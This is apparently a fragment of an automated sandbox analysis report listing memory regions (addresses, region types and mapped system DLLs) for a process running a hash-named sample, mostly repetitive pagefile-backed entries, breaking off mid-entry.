region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11933 start_va = 0x850000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 11934 start_va = 0x9e0000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 11935 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 11936 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 11937 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 11938 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11942 start_va = 0x1de0000 end_va = 0x1e9ffff monitored = 0 entry_point = 0x1e00da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 11943 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 11948 start_va = 0x1de0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 11949 start_va = 0x1ee0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 11950 start_va = 0x20e0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 11952 start_va = 0x24e0000 end_va = 0x2cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 11959 start_va = 0x2ce0000 end_va = 0x3caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 13639 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 13640 start_va = 0x3cb0000 end_va = 0x3fe6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 13641 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 13642 start_va = 0x3ff0000 end_va = 0x4277fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 13647 start_va = 0x3ff0000 end_va = 0x4133fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 13651 start_va = 0x3ff0000 end_va = 0x41b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 14139 start_va = 0x3ff0000 end_va = 0x557bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 14884 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 14885 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 14886 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 14887 start_va = 0x3ff0000 end_va = 0x41bcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 14888 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 14889 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14890 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14970 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 15020 start_va = 0x3ff0000 end_va = 0x4151fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 15150 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 15151 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 15152 start_va = 0x1c0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 15153 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 15154 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15155 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15156 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15157 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15158 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15159 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15160 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15161 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15162 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15163 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15164 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15165 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15166 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15167 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15168 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15169 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15170 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15171 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15172 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15173 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15174 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15175 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15176 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15177 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15178 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15179 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15180 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15181 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15182 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15183 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15184 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15185 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15186 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15187 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15188 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15189 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15190 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15191 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15192 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15193 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15194 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15195 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15196 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15197 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15198 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15199 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15200 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15201 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15202 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15203 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15204 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15205 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15206 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15207 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15208 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15209 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15210 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15211 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15212 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15213 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15214 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15215 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15216 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15217 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15218 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15219 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15220 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15221 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15222 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15223 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15224 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15225 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15226 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15227 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15228 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15229 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15230 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15231 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15232 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15233 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15234 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15235 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15236 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15237 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15238 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15239 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15240 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15241 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15242 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15243 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15244 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15245 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15246 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15247 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15248 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15249 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15250 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15251 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15252 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15253 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15254 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15255 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15256 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15257 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15258 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15259 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15260 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15261 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15262 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15263 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15264 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15265 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15266 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15267 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15268 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15269 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15270 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15271 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15272 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15273 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15274 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15275 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15276 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15277 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15278 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15279 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15280 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15281 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15282 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15283 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15284 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15285 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15286 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15287 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15288 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15289 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15290 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15291 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type 